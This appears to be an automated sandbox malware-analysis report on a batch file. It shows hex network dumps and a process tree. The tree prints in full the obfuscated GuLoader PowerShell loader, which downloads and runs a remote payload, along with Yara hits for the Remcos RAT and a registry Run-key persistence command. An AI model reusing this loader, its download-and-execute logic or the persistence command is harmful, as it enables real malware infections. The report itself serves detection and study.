ea 14 f3 d8 02 f1 7f 7c 67 bd f3 9f cb c9 e1 1a 1c 0e c2 ae 8b 3e d8 b0 08 2d e0 83 79 0d 0a 9f fd ac 91 5c bf 24 b8 62 72 13 df 9e d5 71 f7 2c 1d 16 b5 50 9e 99
                                                                                                    Data Ascii: }ieoAMFK<<0U@_c';R@U]Ffp]~UK%T0ZSloX4#Ie`o\*1Mu*T?q-M\B6txTru::OTyahUK@.%-/`y[fj%NrJ9<Pw|>!|g>-y\$brq,P
                                                                                                    2024-10-23 15:23:15 UTC16384INData Raw: 25 d4 b9 85 9f 0e 9f 10 08 08 e2 8c 89 b3 f3 41 d7 67 12 30 b0 62 85 54 b8 1e 18 11 fa cd 0d 5d be 1e e6 e9 9f b3 1d c1 5b 59 0f 4b 24 49 67 f3 9f 45 61 3d b1 d6 39 cb c6 9c 79 3d 0a 29 5f 65 06 9a 9f 8a 55 a1 18 73 0d 4f 3b c4 f4 78 83 31 d7 42 71 f6 32 f7 18 2f e5 95 d1 bf 52 b1 66 3f a4 22 b3 61 4f 87 62 e3 f8 61 d6 e5 5d 92 90 9f 9c 1b 60 f0 3b 11 d5 99 f3 74 5b ea 2b 76 b3 15 d9 ec 15 47 6c 15 e4 af 8a 1e 48 1b ba 7b b2 c7 72 e1 29 bb 63 76 ca 01 de 83 f2 94 05 b9 5e 80 30 4f cc 1e d4 6c 26 5a a9 bf fe cf 6a 2c 11 c4 93 c9 6c 84 bd 82 f6 57 7d e8 09 24 5f db 0e de b6 33 42 1b 88 4e f7 ff 61 88 24 c0 90 bb 56 12 78 7a 81 4e a4 63 ab 2a 7d ac 30 8d c7 91 8a c8 d1 d7 aa 68 20 95 b3 08 79 2c 24 64 fc 6f 4d ac c9 21 09 aa 6e 5b d9 f1 22 60 9a d5 19 d3 ea
                                                                                                    Data Ascii: %Ag0bT][YK$IgEa=9y=)_eUsO;x1Bq2/Rf?"aOba]`;t[+vGlH{r)cv^0Ol&Zj,lW}$_3BNa$VxzNc*}0h y,$doM!n["`
                                                                                                    2024-10-23 15:23:15 UTC16384INData Raw: 8c 2f ac 0e 35 42 bf af 95 71 90 41 e3 ff e9 9a aa 16 65 3c 7f 09 b3 86 4d a0 e2 46 94 e9 c9 69 d9 54 93 a3 3d a3 9b 8e 4a 06 d3 66 16 12 8b 9c 51 3a e7 ba 3c 5b 58 dd 10 82 02 b7 d5 2f 24 3b 37 63 f8 33 42 b7 b9 3f 71 c9 7a de e4 dd 5d c0 26 d7 e2 e2 17 fb 9b 9e 71 23 54 8f d7 6b 09 36 e9 e4 5d 99 18 bb 49 68 be fe 04 08 f2 65 2b a1 31 58 23 61 af 8a 03 11 12 70 a5 db 00 58 68 8f ff e4 4f da 3f 75 0b a1 e9 93 ea 88 48 c3 1f 29 79 ec c8 ca 18 ce 95 85 cf ce 58 8f 76 82 d5 05 2e bc cd d7 26 eb 5b f9 6f 40 fd 23 c8 92 67 71 b0 3d 69 7e ab cd b5 a9 1b c9 57 a3 41 9b 79 17 3b 09 fb 2a df e0 b9 06 63 09 c5 5e 82 99 04 d3 54 4f 9c c2 6f d0 d3 06 65 c9 12 2a 00 ff f1 34 02 12 03 69 4a fa 77 d3 e0 4f f1 a6 84 81 d0 05 90 5f d2 59 34 39 6c 61 38 9f 17 1e cd 7d e0
                                                                                                    Data Ascii: /5BqAe<MFiT=JfQ:<[X/$;7c3B?qz]&q#Tk6]Ihe+1X#apXhO?uH)yXv.&[o@#gq=i~WAy;*c^TOoe*4iJwO_Y49la8}


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:11:22:32
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ZW_PCCE-010023024001.bat" "
                                                                                                    Imagebase:0x7ff716cb0000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:1
                                                                                                    Start time:11:22:32
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff70f010000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:3
                                                                                                    Start time:11:22:32
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg aanKendg HeteM sqrsmaleSeedsFosi ');$Grasshopper=viruserne 'Stee$,ommfTrotoNon rg nbwKvalaScotrRdhudUsheeSlamr.outs Une.D sbDS,oroGenfwC nfnAntil,fteoCoc.a SttdCow FBesti Baal rugeK.ok(Drug$AntoNPangeBehauIndukVigt, yk$BedvUUdr nP aspPredrPassoEutanTopfoR.abuEnvynEtagcMe oiLog.nUmodgL,ma)Bard ';$Unpronouncing=$Superdural;Vvningens (viruserne 'Maju$ UhaGMultLJugaoP.enb BhmARedeLschl:monafForbOStorLAndeEPr lnS,mmdTadpETri sFa.b=Util( MinTpur.eMarkspresTPinl-Kr nPHaveaKurvtGlasHCebu Mult$SonnUNonvNSam,PP rsrKu doAarsN ,doO UnfUPapanRaggcImplIComiNErklgMand)Undi ');while (!$Folendes) {Vvningens (viruserne 'S.ne$JerngFilmlOpgaoEjsab joka Lnnl Unh: SpuPMa,erKliteLadipRansa StyrCamoeIn tdGent=Porp$Trafttr.kr ForuSubsetetr ') ;Vvningens $Grasshopper;Vvningens (viruserne ' amfsSquiTO.eraCincRIffitBo g- EliS EgnlInv,EspalEabscpLers Ep.s4Arg. ');Vvningens (viruserne 'bygg$ S vgContLE suOVedfBSc lA icol Leg:JoblFSolboLoyaLForbE L knTrandGyroEUnsesSmed=Ni.r( ,rgtG steChrosInteTHerb- AbsP Tobakartt egeh nmo Arc$Shawu,ejlnArbepInv RAcetoTrevnU saO ur,UfolkNFormCSunli.pronHypeGHype) Haa ') ;Vvningens (viruserne 'Over$pipegSemilGrimOP,eubGingABoutLFors:AyahCC.plOM.ssmUntreUnsclVe dITeloEInjusa meT Pyg=Barf$SkycGLovblorpiogigaB Dama MunLPenn:frembE ideGe tmVninE OpseBrygT Uns+ Skr+Und %Unsu$cultMf jloUnb.STorpa imeiSpanKActuK SecE .lirAnemNSkruEEmer.Te rCDyreO indu AksNMicrT en ') ;$Neuk=$mosaikkerne[$Comeliest];}$Forvrrelser=319177;$synclastic=31223;Vvningens (viruserne 'Sk l$ ootgExcyl omsoS ilbSupeaPertL.ern:LimpKPr.doTrouMNrinMPolyEScopNHeretChapeSe,vRDri EKe,uNW.ipdDub E F rSSvmm Dksl= Kla epidgUncaEEx,itKrse- Kupc ArcOD sinUs,utMurbEOmhunK ontSko. Forh$S igUBillNTes,PHomerBekoo Swan SulOIwarU,entNCounCC vii Komnh stg Bkk ');Vvningens (viruserne ' en$ MalgTreflSkaloSh rbVanda ovel jou:Mrk fStila SvilEncld.elseColor elaeFan b ibsGru t Perr nona rnrplebbpForgeMavesRawl Pro,= ubr Sho[ConvS,arbyInexsCompt InieN.rvm ir.GoneC L.mo ArbnfarmvShodeAnabrAsket Fac]Ra k: iff:TetrFDaasrWateoMes.mPlotBDefia MagsOvereCele6Gree4St,rSGun tT.rnrForfiNot nMantgPal (Brev$TachK G.eoPi pmInh m rabeOptin sv t.eboe RygrGallemarinLinjdVrikeHalvsrdde) nds ');Vvningens (viruserne 'Unde$ ownG urhL ForoAl,sbAutoaLyspLlakf: SetpSagsaSt uTAstme repNTovnTBorieC.ilR StuI.eerNCo ogSkr,el teR friNS alEshudSdeto Dato=Stic Rape[ omfsUnmaYKlimSDiopT.ffieFla.MDem .shoptLommeDobbxSyndtSizz. utaeSmrenIndiC FarObostDPibeI Prenchapgdyre]k mm: nin: aliaCladS TimCLeptICaprIF rb.RiddGFlorE,lketFredSIntetMat.RTemiIC,rynKlamGinve(Non,$ UnrfCoonAPostLSepaDUnpreSygdRMumme CarbEnqus svat Smar JenAKal PCyclpklunE rots Oks)Broa ');Vvningens (viruserne ' S l$Be.oGW.teLfsteoK,tyBFrieaMu,eLGr m: KrueS btU Bkbr FreyBeerA BrdlTa tePaaka,eboN N,u=s.aa$Corop BalaNidstSavle ,ejnMiniTCr nESalvROsmoipelonLoregMotoeTopur H,snPosteVa uS U o.Pasts,eopuCa ib AldSforhT O eRGranI jednSub,gBekn( und$LaboFOncioHonortrilVrespRj aprSundeFil.LCymbs UndENit Rlag ,Ditl$Afd sVedky BluNVe nCCon l innA CedSDe aTS,uliTilscP.zz) Is ');Vvningens $Euryalean;"
                                                                                                    Imagebase:0x7ff760310000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1476663613.0000013F90071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:11:22:32
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff70f010000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:11:22:41
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg aanKendg HeteM sqrsmaleSeedsFosi ');$Grasshopper=viruserne 'Stee$,ommfTrotoNon rg nbwKvalaScotrRdhudUsheeSlamr.outs Une.D sbDS,oroGenfwC nfnAntil,fteoCoc.a SttdCow FBesti Baal rugeK.ok(Drug$AntoNPangeBehauIndukVigt, yk$BedvUUdr nP aspPredrPassoEutanTopfoR.abuEnvynEtagcMe oiLog.nUmodgL,ma)Bard ';$Unpronouncing=$Superdural;Vvningens (viruserne 'Maju$ UhaGMultLJugaoP.enb BhmARedeLschl:monafForbOStorLAndeEPr lnS,mmdTadpETri sFa.b=Util( MinTpur.eMarkspresTPinl-Kr nPHaveaKurvtGlasHCebu Mult$SonnUNonvNSam,PP rsrKu doAarsN ,doO UnfUPapanRaggcImplIComiNErklgMand)Undi ');while (!$Folendes) {Vvningens (viruserne 'S.ne$JerngFilmlOpgaoEjsab joka Lnnl Unh: SpuPMa,erKliteLadipRansa StyrCamoeIn tdGent=Porp$Trafttr.kr ForuSubsetetr ') ;Vvningens $Grasshopper;Vvningens (viruserne ' amfsSquiTO.eraCincRIffitBo g- EliS EgnlInv,EspalEabscpLers Ep.s4Arg. ');Vvningens (viruserne 'bygg$ S vgContLE suOVedfBSc lA icol Leg:JoblFSolboLoyaLForbE L knTrandGyroEUnsesSmed=Ni.r( ,rgtG steChrosInteTHerb- AbsP Tobakartt egeh nmo Arc$Shawu,ejlnArbepInv RAcetoTrevnU saO ur,UfolkNFormCSunli.pronHypeGHype) Haa ') ;Vvningens (viruserne 'Over$pipegSemilGrimOP,eubGingABoutLFors:AyahCC.plOM.ssmUntreUnsclVe dITeloEInjusa meT Pyg=Barf$SkycGLovblorpiogigaB Dama MunLPenn:frembE ideGe tmVninE OpseBrygT Uns+ Skr+Und %Unsu$cultMf jloUnb.STorpa imeiSpanKActuK SecE .lirAnemNSkruEEmer.Te rCDyreO indu AksNMicrT en ') ;$Neuk=$mosaikkerne[$Comeliest];}$Forvrrelser=319177;$synclastic=31223;Vvningens (viruserne 'Sk l$ ootgExcyl omsoS ilbSupeaPertL.ern:LimpKPr.doTrouMNrinMPolyEScopNHeretChapeSe,vRDri EKe,uNW.ipdDub E F rSSvmm Dksl= Kla epidgUncaEEx,itKrse- Kupc ArcOD sinUs,utMurbEOmhunK ontSko. Forh$S igUBillNTes,PHomerBekoo Swan SulOIwarU,entNCounCC vii Komnh stg Bkk ');Vvningens (viruserne ' en$ MalgTreflSkaloSh rbVanda ovel jou:Mrk fStila SvilEncld.elseColor elaeFan b ibsGru t Perr nona rnrplebbpForgeMavesRawl Pro,= ubr Sho[ConvS,arbyInexsCompt InieN.rvm ir.GoneC L.mo ArbnfarmvShodeAnabrAsket Fac]Ra k: iff:TetrFDaasrWateoMes.mPlotBDefia MagsOvereCele6Gree4St,rSGun tT.rnrForfiNot nMantgPal (Brev$TachK G.eoPi pmInh m rabeOptin sv t.eboe RygrGallemarinLinjdVrikeHalvsrdde) nds ');Vvningens (viruserne 'Unde$ ownG urhL ForoAl,sbAutoaLyspLlakf: SetpSagsaSt uTAstme repNTovnTBorieC.ilR StuI.eerNCo ogSkr,el teR friNS alEshudSdeto Dato=Stic Rape[ omfsUnmaYKlimSDiopT.ffieFla.MDem .shoptLommeDobbxSyndtSizz. utaeSmrenIndiC FarObostDPibeI Prenchapgdyre]k mm: nin: aliaCladS TimCLeptICaprIF rb.RiddGFlorE,lketFredSIntetMat.RTemiIC,rynKlamGinve(Non,$ UnrfCoonAPostLSepaDUnpreSygdRMumme CarbEnqus svat Smar JenAKal PCyclpklunE rots Oks)Broa ');Vvningens (viruserne ' S l$Be.oGW.teLfsteoK,tyBFrieaMu,eLGr m: KrueS btU Bkbr FreyBeerA BrdlTa tePaaka,eboN N,u=s.aa$Corop BalaNidstSavle ,ejnMiniTCr nESalvROsmoipelonLoregMotoeTopur H,snPosteVa uS U o.Pasts,eopuCa ib AldSforhT O eRGranI jednSub,gBekn( und$LaboFOncioHonortrilVrespRj aprSundeFil.LCymbs UndENit Rlag ,Ditl$Afd sVedky BluNVe nCCon l innA CedSDe aTS,uliTilscP.zz) Is ');Vvningens $Euryalean;"
                                                                                                    Imagebase:0xf30000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1678908955.0000000008980000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1657579338.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1679189709.000000000A606000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:11:22:42
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff70f010000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:11:22:59
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                    Imagebase:0x9f0000
                                                                                                    File size:59'904 bytes
                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2715933734.0000000008A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:9
                                                                                                    Start time:11:23:10
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
                                                                                                    Imagebase:0xc50000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:10
                                                                                                    Start time:11:23:10
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff70f010000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:11
                                                                                                    Start time:11:23:10
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"
